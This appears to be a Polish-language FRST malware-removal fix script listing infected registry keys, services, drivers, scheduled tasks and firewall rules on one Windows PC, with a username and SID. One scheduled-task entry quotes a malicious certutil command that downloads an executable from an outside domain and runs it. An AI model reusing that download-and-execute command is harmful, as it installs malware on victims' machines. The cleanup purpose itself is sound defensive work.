CloseProcesses:
CreateRestorePoint:
EmptyTemp:
File: C:\Program Files (x86)\SmartData\performer.exe
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Run: [PolishedCherry] => C:\WINDOWS\rss\csrss.exe [4537856 2019-01-28] () <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Run: [CloudNet] => C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-04] (EpicNet Inc.) <==== UWAGA
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\Policies\Explorer: [TaskbarNoNotification] 1
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\MountPoints2: {9f2a5831-2a07-11e9-99fb-ac9e17868d3b} - "J:\SetFH3.exe"
HKU\S-1-5-21-115981727-767816172-525159574-1001\...\MountPoints2: {a7fb4d2f-0ab9-11e9-9991-ac9e17868d3b} - "H:\SetFH3.exe"
Startup: C:\Users\mrvit\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uahtdrii.lnk [2019-02-06]
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{1d4fa830-2139-4597-be95-1b61a6b48023}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{400f1cc0-de6c-48ec-8214-2af832a4ad2b}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{6fbec42c-2c0b-4678-8f3c-cb5715b87940}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8d3586d4-cbe0-4a6a-8fb7-a2e168616594}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8d3586d4-cbe0-4a6a-8fb7-a2e168616594}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{c6368515-286d-434a-b917-35e9e5d7b09b}: [NameServer] 8.8.8.8
BHO: YoutubeAdBlock -> {E81D3BD4-0E3E-4B58-BEC1-F3791DAA11A8} -> C:\Program Files (x86)\eWuDAKEgxIE\t44LQUUnP.dll => Brak pliku
BHO-x32: YoutubeAdBlock -> {E81D3BD4-0E3E-4B58-BEC1-F3791DAA11A8} -> C:\Program Files (x86)\eWuDAKEgxIE\kkvtUqip.dll => Brak pliku
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
R2 EventSvc; C:\ProgramData\Microsoft\Windows\EventSvc\eventsvc.exe [360448 2018-07-24] (CloudBees, Inc.) [Brak podpisu cyfrowego] <==== UWAGA
R2 PowerSvc; C:\ProgramData\Microsoft\Windows\Power\PowerSvc.exe [6406448 2018-06-25] () [Brak podpisu cyfrowego] <==== UWAGA
R2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-28] () [Brak podpisu cyfrowego]
S2 SysSvc; C:\Users\mrvit\AppData\Local\NtvHost\syssvc.exe [360448 2019-01-28] (CloudBees, Inc.) [Brak podpisu cyfrowego] <==== UWAGA
R2 WinDefender; C:\Windows\windefender.exe [0 ] (CreateFileW function failed -> ) <==== UWAGA (zerobajtowy plik/folder)
R2 WindowsEvent; C:\ProgramData\WinEvent\WindowsEvent.exe [364032 2019-01-22] () [Brak podpisu cyfrowego]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] (WDKTestCert Admin,131480495282941941 -> ) <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (WDKTestCert Admin,131480495282941941 -> Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
S1 halihdhr; \??\C:\Windows\system32\drivers\halihdhr.sys [X]
S1 jkllezcx; \??\C:\Windows\system32\drivers\jkllezcx.sys [X]
2019-02-04 19:30 - 2019-02-04 19:31 - 000000000 ____D C:\ProgramData\R9X7AI53YBFY8SFGXFJJ
2019-01-31 15:04 - 2019-01-31 15:04 - 000000000 ____D C:\ProgramData\ARLJP1RUHLEXXC8JQ10A
2019-01-28 20:18 - 2019-01-28 20:36 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\wjhksfvwjtj
2019-01-28 19:15 - 2019-01-28 19:17 - 005937968 _____ (EnigmaSoft Limited) C:\Users\mrvit\Downloads\sh-remover.exe
2019-01-28 19:15 - 2019-01-28 19:15 - 000000000 ____D C:\ProgramData\eJBlAwaaSdTwMIVBOCtXDXkWQj
2019-01-28 19:14 - 2019-01-28 20:36 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\2a3jlpdtl1r
2019-01-28 19:14 - 2019-01-28 20:20 - 000000000 ____D C:\Users\mrvit\AppData\Roaming\CRMSvc
2019-01-28 18:58 - 2019-01-28 20:36 - 000000000 ____D C:\Windows\SysWOW64\jshcaaky
2019-02-04 16:02 - 2018-12-16 14:00 - 000000266 __RSH C:\ProgramData\ntuser.pol
C:\WINDOWS\rss\csrss.exe
C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
2019-02-06 09:36 - 2019-02-06 09:36 - 000350208 _____ (Google Ventures) C:\Users\mrvit\AppData\Local\Temp\17D3.tmp.exe
2019-01-31 17:46 - 2019-01-31 17:46 - 000623616 _____ (TODO: ) C:\Users\mrvit\AppData\Local\Temp\5606.tmp.exe
2019-01-31 13:07 - 2019-01-31 13:07 - 000841216 _____ (TODO: ) C:\Users\mrvit\AppData\Local\Temp\91E.tmp.exe
2019-02-06 15:00 - 2019-02-06 15:00 - 000493568 _____ () C:\Users\mrvit\AppData\Local\Temp\93BA.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Bah.exe
2019-01-29 18:27 - 2019-01-29 18:27 - 000438272 _____ () C:\Users\mrvit\AppData\Local\Temp\BB43.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Bethoven.exe
2019-01-28 20:40 - 2019-01-28 20:33 - 002237968 _____ (Kaspersky Lab ZAO) C:\Users\mrvit\AppData\Local\Temp\CEA8C357-626B-4535-843F-4143CB372398.exe
2019-01-29 14:56 - 2019-01-29 14:56 - 000438272 _____ () C:\Users\mrvit\AppData\Local\Temp\D7CE.tmp.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Mocart.exe
2019-01-29 14:56 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Paganini.exe
2019-01-29 15:01 - 2019-01-29 18:32 - 000004096 _____ (Marat Tanalin) C:\Users\mrvit\AppData\Local\Temp\Vivaldi.exe
Task: {06C203A5-06C8-4C37-B89C-AB8E4F9F712F} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\6.1.0\Scheduler.exe
Task: {0E422A81-FA6D-4391-8BBD-3F4DCA5DD7C4} - System32\Tasks\Windows Defender => C:\Users\mrvit\AppData\Roaming\driver\driver.exe
Task: {24A62FBF-CF92-4C87-95C1-B814B345C5F9} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-28] () <==== UWAGA
Task: {927F53F1-F735-48CE-B647-62E2BEF75AEE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://andreysharanov.info/app/app.exe C:\Users\mrvit\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mrvit\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {BF891601-CF66-4B87-8073-FF4E5089D0D4} - System32\Tasks\Driver Booster SkipUAC (mrvit) => C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe
2019-02-06 13:09 - 2019-02-06 13:09 - 001207296 _____ () C:\Users\mrvit\AppData\Local\Temp\is-REDNS.tmp\SetFH3.tmp
2019-02-06 13:09 - 2018-06-09 15:36 - 000009728 _____ () C:\Users\mrvit\AppData\Local\Temp\is-1GP6P.tmp\unarctest.exe
2019-01-28 18:58 - 2019-01-28 20:19 - 002204672 _____ () C:\Program Files (x86)\SmartData\performer.exe
AlternateDataStreams: C:\desktop.ini:CachedTiles [462]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\Bandicam:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\desktop.ini:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\OpenIV:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\mrvit\OneDrive\Documents\Rockstar Games:${3D0CE612-FDEE-43f7-8ACA-957BEC0CCBA0}.Metadata [194]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [470]
FirewallRules: [{E94BF94A-C950-4A96-AB99-F9A766808393}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe Brak pliku
FirewallRules: [{85C2864B-ACDE-4BAA-992D-F0BEAB832656}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DriverBooster.exe Brak pliku
FirewallRules: [{B55CAFF4-421D-4E12-879F-2C2329A0E9BC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DBDownloader.exe Brak pliku
FirewallRules: [{7721B1F3-0EF8-4628-B503-22E7B0AFD628}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\DBDownloader.exe Brak pliku
FirewallRules: [{733F55F9-A0BC-4328-8FBC-B7A6E93A00E4}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\AutoUpdate.exe Brak pliku
FirewallRules: [{1A4DFF03-2C17-493B-926E-8E564EE0F9FC}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.1.0\AutoUpdate.exe Brak pliku
FirewallRules: [{B12AF87A-843A-44B3-8479-523B79D40613}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku
FirewallRules: [{4BD287FD-1A8F-4DB3-A341-E22BC9477568}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe Brak pliku
FirewallRules: [TCP Query User{238CD3D3-AEF1-46ED-94BF-7B88144DFD7E}C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe Brak pliku
FirewallRules: [UDP Query User{947016F5-970B-47D5-B647-A3FCF31BA0D4}C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\backyard brawl\backyardbrawl\binaries\win64\backyardbrawl-win64-shipping.exe Brak pliku
FirewallRules: [TCP Query User{872F4C78-485F-4375-B465-90B74B3D3D39}C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe] => (Block) C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe Brak pliku
FirewallRules: [UDP Query User{10DEB734-2962-4620-9E37-09DC88D6FC46}C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe] => (Block) C:\users\mrvit\onedrive\pulpit\setup\fifa19.exe Brak pliku
FirewallRules: [{75D19098-BCA4-452F-BF09-70817B2389F5}] => (Allow) C:\Users\mrvit\OneDrive\Pulpit\Setup\FIFASetup\fifaconfig.exe Brak pliku
FirewallRules: [{3792F067-9364-44DC-A29E-05961937AC38}] => (Allow) C:\Users\mrvit\OneDrive\Pulpit\Setup\FIFASetup\fifaconfig.exe Brak pliku
FirewallRules: [TCP Query User{6134F20D-0CCE-440C-9476-5D60B67A7CBC}C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe Brak pliku
FirewallRules: [UDP Query User{91B73DE9-204D-422D-BFCB-E086618D734A}C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_191\bin\javaw.exe Brak pliku
FirewallRules: [TCP Query User{434E980A-0BC7-4108-81F1-1D0A060F00C6}C:\program files\java\jre1.8.0_161\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_161\bin\javaw.exe Brak pliku
FirewallRules: [UDP Query User{07C4CA16-8C3F-418E-8242-3CDA65806B6D}C:\program files\java\jre1.8.0_161\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_161\bin\javaw.exe Brak pliku
FirewallRules: [TCP Query User{1E03A2EB-4132-438A-8E4B-CC8B71C4E078}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{249E0D64-F101-4B33-98BE-F0493B01F844}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [TCP Query User{07DC604E-FB36-4516-A820-31F66C8D9B62}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [UDP Query User{AB001B20-E45E-4907-9660-CC9F38427504}C:\program files\java\jre1.8.0_201\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_201\bin\javaw.exe (Oracle America, Inc. -> Oracle Corporation)
FirewallRules: [{06096381-9327-4DB3-B041-7BEFACF7A63E}] => (Allow) C:\WINDOWS\rss\csrss.exe ()
FirewallRules: [{AF3804AF-BB0B-4F7D-B012-B5EF1A9416A5}] => (Allow) C:\Users\mrvit\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{58671782-9E0A-4238-80FF-395771E120CF}] => (Allow) LPort=3389
RemoveProxy:
CMD: ipconfig /flushdns